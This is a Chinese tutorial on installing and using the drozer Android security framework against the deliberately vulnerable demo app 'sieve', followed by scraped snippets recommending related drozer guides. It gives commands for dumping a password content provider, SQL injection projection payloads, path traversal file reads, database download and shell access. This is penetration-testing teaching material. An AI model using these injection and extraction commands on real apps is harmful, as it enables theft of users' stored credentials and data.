Drozer ⼯具的安装与启动:源码地址(https://github.com/mwrlabs/drozer/)
1. 安装
(1) 下载 https://www.mwrinfosecurity.com/products/drozer/community-edition/
Mac下可以下载python版
(2) PC上安装drozer:
sudo easy_install --allow-hosts pypi.python.org protobuf==2.4.1
easy_install twisted==10.2.0 (为了⽀持Infrastructure模式)
sudo easy_install ./drozer-2.3.4-py2.7.egg
(3) 在Android设备上安装agent.apk
adb install agent.apk
2. 启动
(1) PC上使⽤adb进⾏端⼝转发,转发到Drozer使⽤的端⼝31415
adb forward tcp:31415 tcp:31415
(2) 在Android设备上开启Drozer Agent,选择embedded server-enabled
(3) 在PC上开启Drozer Console
drozer console connect
一、 Android组件安全测试
1.获取包名
dz> run app.package.list -f sieve
com.mwr.example.sieve
2.获取应用的基本信息
run app.package.info -a com.mwr.example.sieve
3.确定攻击面
run app.package.attacksurface com.mwr.example.sieve
4.Activity
(1)获取activity信息
run app.activity.info -a com.mwr.example.sieve
(2)启动activity
run app.activity.start --component com.mwr.example.sieve
dz> help app.activity.start
usage: run app.activity.start -h --action ACTION --category CATEGORY
--component PACKAGE COMPONENT --data-uri DATA_URI
--extra TYPE KEY VALUE [--flags FLAGS FLAGS ...]
--mimetype MIMETYPE
5.Content Provider
(1)获取Content Provider信息
run app.provider.info -a com.mwr.example.sieve
(2)Content Providers(数据泄露)
先获取所有可以访问的Uri:
run scanner.provider.finduris -a com.mwr.example.sieve
获取各个Uri的数据:
run app.provider.query
content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
查询到数据说明存在漏洞
(3)Content Providers(SQL注入)
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
报错则说明存在SQL注入。
列出所有表:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ -projection "* FROM SQLITE_MASTER WHERE type='table';-"
获取某个表(如Key)中的数据:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ -projection "* FROM Key;-"
(4)同时检测SQL注入和目录遍历
run scanner.provider.injection -a com.mwr.example.sieve
run scanner.provider.traversal -a com.mwr.example.sieve
6.Service
(1)获取service详情
run app.service.info -a com.mwr.example.sieve
不使用drozer启动service
am startservice --n 包名/service名
7.Broadcast Receiver
app.broadcast.info 获取broadcast receivers信息
app.broadcast.send 通过intent发送broadcast receiver
全部命令:
list //列出目前可用的模块,也可以使用ls > help app.activity.forintent //查看指定模块的帮助信息 > run app.package.list //列出android设备中安装的app > run app.package.info -a com.android.browser //查看指定app的基本信息 > run app.activity.info -a com.android.browser //列出app中的activity组件 > run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com //开启一个activity,例如运行浏览器打开谷歌页面 > run scanner.provider.finduris -a com.sina.weibo //查找可以读取的Content Provider > run app.provider.query content://settings/secure --selection "name='adb_enabled'" //读取指定Content Provider内容 > run scanner.misc.writablefiles --privileged /data/data/com.sina.weibo //列出指定文件路径里全局可写/可读的文件 > run shell.start //shell操作 > run tools.setup.busybox //安装busybox > list auxiliary //通过web的方式查看content provider组件的相关内容 > help auxiliary.webcontentresolver //webcontentresolver帮助 > run auxiliary.webcontentresolver //执行在浏览器中以http://localhost:8080即可访问 以sieve示例 > run app.package.list -f sieve //查找sieve应用程序 > run app.package.info -a com.mwr.example.sieve //显示app.package.info命令包的基本信息 > run app.package.attacksurface com.mwr.example.sieve //确定攻击面 > run app.activity.info -a com.mwr.example.sieve //获取activity信息 > run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList //启动pwlist > run app.provider.info -a com.mwr.example.sieve //提供商信息 > run scanner.provider.finduris -a com.mwr.example.sieve //扫描所有能访问地址 >run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/--vertical //查看DBContentProvider/Passwords这条可执行地址 > run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'" //检测注入 > run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts //查看读权限数据 > run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db //下载数据 > run scanner.provider.injection -a com.mwr.example.sieve //扫描注入地址 > run scanner.provider.traversal -a com.mwr.example.sieve > run app.service.info -a com.mwr.example.sieve //查看服务
相关推荐
此外,"移动应用程序黑客手册"也是一份有价值的资源,其中详细介绍了 Android 安全概念和 drozer 的使用方法。 要开始使用 drozer,你需要准备一台运行 Windows、Linux 或 Mac OS X 的电脑,以及至少运行 Android ...
【drozer用户手册-drozer Users' Guide-2.3.4】-英文 drozer是一款针对Android系统的安全测试框架。Drozer可以通过与Dalivik VM,其它应用程序的IPC端点以及底层操作系统的交互,避免正处于开发阶段,或者部署于你的...
### Drozer简介及使用 #### 一、Drozer简介 Drozer是一款专为Android系统设计的安全测试框架。该工具允许用户通过与Dalvik VM、其他应用程序的IPC(Inter-Process Communication)端点以及底层操作系统进行交互,...
2. 在CMD中,使用`adb devices`检查设备连接,`adb forward tcp:31415 tcp:31415`设置端口转发,然后`drozer.bat console connect`连接到手机。 3. 开始测试: - `run app.package.list –f shinow`查找APP全称。 ...
《Drozer使用说明详解与示范APK》 在Android应用开发和安全研究领域,Drozer是一款由MWR InfoSecurity公司开发的强大工具,它专为深入分析和测试Android应用程序的安全性而设计。通过这款工具,专业人士能够有效地...
**Drozer 使用指南** Drozer 是一款强大的Android安全评估工具,由MWR InfoSecurity开发,用于检测和利用Android应用程序、系统服务以及设备上的安全漏洞。它通过提供一套全面的API,使得安全研究人员和渗透测试...
在这个博客中,作者可能详细阐述了drozer的使用方法、功能、应用场景以及如何通过drozer进行Android应用的安全测试和漏洞挖掘。 **标签解析:** 1. **drozer** - drozer是一款强大的Android安全评估框架,它允许...
Drozer的使用指南详细介绍了如何安装和使用这个工具,包括了对Drozer概念的讲解、如何安装以及在不同操作系统环境下的配置方法。尽管文档中有些内容是通过OCR扫描得到的,可能包含技术原因导致的个别字识别错误或漏...
Drozer 使用指南英文版 Drozer 有助于提供信心,即由您的组织开发或部署的 Android 应用程序和设备不会带来不可接受的风险。通过允许您与 DalvikVM、其他应用程序的 IPC 端点和底层操作系统进行交互 Drozer 提供了...
drozer资料可能包含了上述组件的详细使用指南、示例脚本、常见问题解答以及安全测试的最佳实践。通过深入学习和实践,安全研究人员可以更好地利用drozer来发现和修复Android系统的安全漏洞,提升应用程序的安全性。
drozer提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程漏洞,drozer能够生产shellcode帮助你部署drozer代理作为一个远程管理工具,最大化对设备的利用。 更快的Android安全评估 drozer可以大大...
Drozer 是一款功能强大的 Android 渗透测试工具,但是在使用时,可能会遇到中文乱码的问题。今天,我们将探讨 Drozer 中文乱码解决办法。 一、问题描述 在使用 Drozer 时,可能会遇到中文乱码的问题。例如,在...
在使用drozer进行渗透测试时,通常需要先安装drozer代理到目标设备,然后通过命令行界面(CLI)或其提供的Python API发送指令。开发者提供的"drozer-develop"文件可能包含了源码、文档、示例脚本和其他开发资源,...
drozer提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程漏洞,drozer能够生产shellcode帮助你部署drozer代理作为一个远程管理工具,最大化对设备的利用。 更快的Android安全评估 drozer可以大大...
drozer提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程漏洞,drozer能够生产shellcode帮助你部署drozer代理作为一个远程管理工具,最大化对设备的利用。 更快的Android安全评估 drozer可以大大...
无论是开发者还是安全研究人员,都可以通过学习和使用Drozer来提升对Android应用安全的理解和防护能力。通过深入分析权限、组件、服务和动态行为,Drozer可以帮助我们构建更安全的应用环境,抵御日益复杂的移动安全...
为了检测潜在的漏洞和安全风险,开发者和安全专家常常使用专业工具,如drozer。drozer是一款强大的开源Android渗透测试框架,它允许安全研究人员通过API滥用、权限提升和信息泄漏等多种方式来发现和利用Android系统...
在Windows环境下使用Drozer,你可以享受到跨平台的优势,无需在Linux或Mac上进行复杂的环境配置。这使得Windows用户也能方便地参与到Android应用的安全测试中。 **核心功能** 1. **代码审计**:Drozer提供了模块化...
安卓工具drozer安装和使用(anaconda) 在这篇文章中,我们将讲解如何安装和使用安卓渗透测试工具Drozer,包括环境准备、安装Drozer、配置Python环境、创建连接和测试模拟器安装的软件包。 环境准备是 Drozer 安装...